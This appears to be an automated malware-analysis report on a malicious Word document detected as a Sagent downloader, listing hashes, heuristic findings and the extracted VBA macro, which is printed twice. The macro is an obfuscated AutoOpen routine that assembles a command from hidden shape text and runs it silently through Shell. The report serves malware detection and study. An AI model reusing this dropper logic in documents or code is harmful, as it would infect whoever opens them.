Office (OLE) malware analysis — malicious · 39c24b576926abc9

MALICIOUS

Office (OLE)

81.5 KB Created: 2018-11-22 12:52:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: bef568aa076b54c4c955a8bb20ee7101 SHA-1: f3ea28df159c1f9cb9b757325ab27aec719196f2 SHA-256: 39c24b576926abc9621baa08a1d35ca276daf74e35c3a83ccec41c343e05626e

242 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Sagent-6769824-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-6769824-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3454 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3454 bytes
SHA-256: `1b33ebee1081405f2f9b4ed24e13ce30e0ab5cb9f63446c841e7b22a0adfada3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SGPmtMOmvjEdO" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next For nkzFili = 221498329 To NtLQZ Select Case wwzKGh Case 249430698 WSsBH = Rnd(vjCvwv) BPFOPHf = zUmqCl iMPsBcc = Log(260953846) End Select jbPIdrPR = pzitvqZ / 45408327 Next On Error Resume Next For PsmzrtfTY = 44876499 To wJTmoIRJ Select Case SGVHaUOk Case 73701222 XlKrq = Rnd(sXipGFccZ) jFTlHjYA = IWiZXiu XjBoR = Log(190489203) End Select wknUiMdt = okJRZtnM / 66817624 Next Set aNwHKLwF = Shapes("QibNOrt") On Error Resume Next For wRNUp = 222203737 To aziTNh Select Case FkQvCB Case 37073831 luUnqzH = Rnd(hpIrS) YLTlBw = cWEzW mZNluzSj = Log(129488095) End Select BqRTs = dFpzn / 79946474 Next oSEjuG = "" + zHcIXP + RUfUEO + lELRukiJ + zJYraUlU + aNwHKLwF.TextFrame.TextRange.Text + qXvkNWzw + ZqwzCHt + PcShfP On Error Resume Next For MHRUkbkG = 256193434 To plZsFUwL Select Case tudlUmB Case 132135784 WzARA = Rnd(ENSHp) SsChCCO = NkDST uiVwhiH = Log(185781937) End Select poYlYnrC = WAaCaERk / 259385636 Next On Error Resume Next For zuZCfm = 205624373 To OMardL Select Case IISnEDY Case 503459 BAflSzv = Rnd(qdzzI) PTvtDFZpl = GbluX PZuEBfHt = Log(13362168) End Select RTAzNa = MDUIK / 138907215 Next On Error Resume Next For AhzRRubZ = 317123159 To lRLnHbzVE Select Case fqpwLPjCI Case 15092210 llpGo = Rnd(FiBaNXO) koGzE = wIWAKr FCLYR = Log(302154273) End Select zfWhTEtq = YRSbo / 175906862 Next On Error Resume Next For VwQTIGSj = 43505020 To XcjwPmKfh Select Case UEwGS Case 202218199 jhWUvBBK = Rnd(IWvTmVt) RozQvS = FLcUR KAdTm = Log(13320648) End Select Vcahnldn = NVzKioih / 154754382 Next DDkHdPo = Interaction.Shell(CVar("") + SzcpBwda + SZjzY + oSEjuG + zjsQP + iVNJjWQ + fVHDX + WmuNOWU + AYRFD, vbHide) On Error Resume Next For XPNqiHhq = 281048786 To QTLjaiaWN Select Case qHFTiEjj Case 243104856 jHpbwQk = Rnd(PYQHmi) POfjHKz = GrPJtMibw NQIij = Log(240466416) End Select zIHpXi = WtOpACd / 128458457 Next On Error Resume Next For RuIAbm = 127300144 To IzVVZfnVq Select Case rSDzVMcc Case 326937515 XTcWQJbk = Rnd(uXRkOtYX) HRQGnjNN = RZvYzo UpUwEQDD = Log(228561453) End Select HZhoGwprU = SQfwICtK / 68169368 Next On Error Resume Next For VVSwhlq = 297819987 To hqufjd Select Case TThRoq Case 340351622 IkpUBoNL = Rnd(zUjDuMF) qczDIMhi = zlLXj WmqwvVs = Log(210402163) End Select fZjOzQ = HchwOAc / 337913210 Next End Sub

SHA-256: 1b33ebee1081405f2f9b4ed24e13ce30e0ab5cb9f63446c841e7b22a0adfada3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SGPmtMOmvjEdO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
     For nkzFili = 221498329 To NtLQZ
         Select Case wwzKGh
         Case 249430698
            WSsBH = Rnd(vjCvwv)
            BPFOPHf = zUmqCl
            iMPsBcc = Log(260953846)
      End Select
      jbPIdrPR = pzitvqZ / 45408327
   Next
   On Error Resume Next
     For PsmzrtfTY = 44876499 To wJTmoIRJ
         Select Case SGVHaUOk
         Case 73701222
            XlKrq = Rnd(sXipGFccZ)
            jFTlHjYA = IWiZXiu
            XjBoR = Log(190489203)
      End Select
      wknUiMdt = okJRZtnM / 66817624
   Next
Set aNwHKLwF = Shapes("QibNOrt")
   On Error Resume Next
     For wRNUp = 222203737 To aziTNh
         Select Case FkQvCB
         Case 37073831
            luUnqzH = Rnd(hpIrS)
            YLTlBw = cWEzW
            mZNluzSj = Log(129488095)
      End Select
      BqRTs = dFpzn / 79946474
   Next
oSEjuG = "" + zHcIXP + RUfUEO + lELRukiJ + zJYraUlU + aNwHKLwF.TextFrame.TextRange.Text + qXvkNWzw + ZqwzCHt + PcShfP
   On Error Resume Next
     For MHRUkbkG = 256193434 To plZsFUwL
         Select Case tudlUmB
         Case 132135784
            WzARA = Rnd(ENSHp)
            SsChCCO = NkDST
            uiVwhiH = Log(185781937)
      End Select
      poYlYnrC = WAaCaERk / 259385636
   Next
   On Error Resume Next
     For zuZCfm = 205624373 To OMardL
         Select Case IISnEDY
         Case 503459
            BAflSzv = Rnd(qdzzI)
            PTvtDFZpl = GbluX
            PZuEBfHt = Log(13362168)
      End Select
      RTAzNa = MDUIK / 138907215
   Next
   On Error Resume Next
     For AhzRRubZ = 317123159 To lRLnHbzVE
         Select Case fqpwLPjCI
         Case 15092210
            llpGo = Rnd(FiBaNXO)
            koGzE = wIWAKr
            FCLYR = Log(302154273)
      End Select
      zfWhTEtq = YRSbo / 175906862
   Next
   On Error Resume Next
     For VwQTIGSj = 43505020 To XcjwPmKfh
         Select Case UEwGS
         Case 202218199
            jhWUvBBK = Rnd(IWvTmVt)
            RozQvS = FLcUR
            KAdTm = Log(13320648)
      End Select
      Vcahnldn = NVzKioih / 154754382
   Next
DDkHdPo = Interaction.Shell(CVar("") + SzcpBwda + SZjzY + oSEjuG + zjsQP + iVNJjWQ + fVHDX + WmuNOWU + AYRFD, vbHide)
   On Error Resume Next
     For XPNqiHhq = 281048786 To QTLjaiaWN
         Select Case qHFTiEjj
         Case 243104856
            jHpbwQk = Rnd(PYQHmi)
            POfjHKz = GrPJtMibw
            NQIij = Log(240466416)
      End Select
      zIHpXi = WtOpACd / 128458457
   Next
   On Error Resume Next
     For RuIAbm = 127300144 To IzVVZfnVq
         Select Case rSDzVMcc
         Case 326937515
            XTcWQJbk = Rnd(uXRkOtYX)
            HRQGnjNN = RZvYzo
            UpUwEQDD = Log(228561453)
      End Select
      HZhoGwprU = SQfwICtK / 68169368
   Next
   On Error Resume Next
     For VVSwhlq = 297819987 To hqufjd
         Select Case TThRoq
         Case 340351622
            IkpUBoNL = Rnd(zUjDuMF)
            qczDIMhi = zlLXj
            WmqwvVs = Log(210402163)
      End Select
      fZjOzQ = HchwOAc / 337913210
   Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.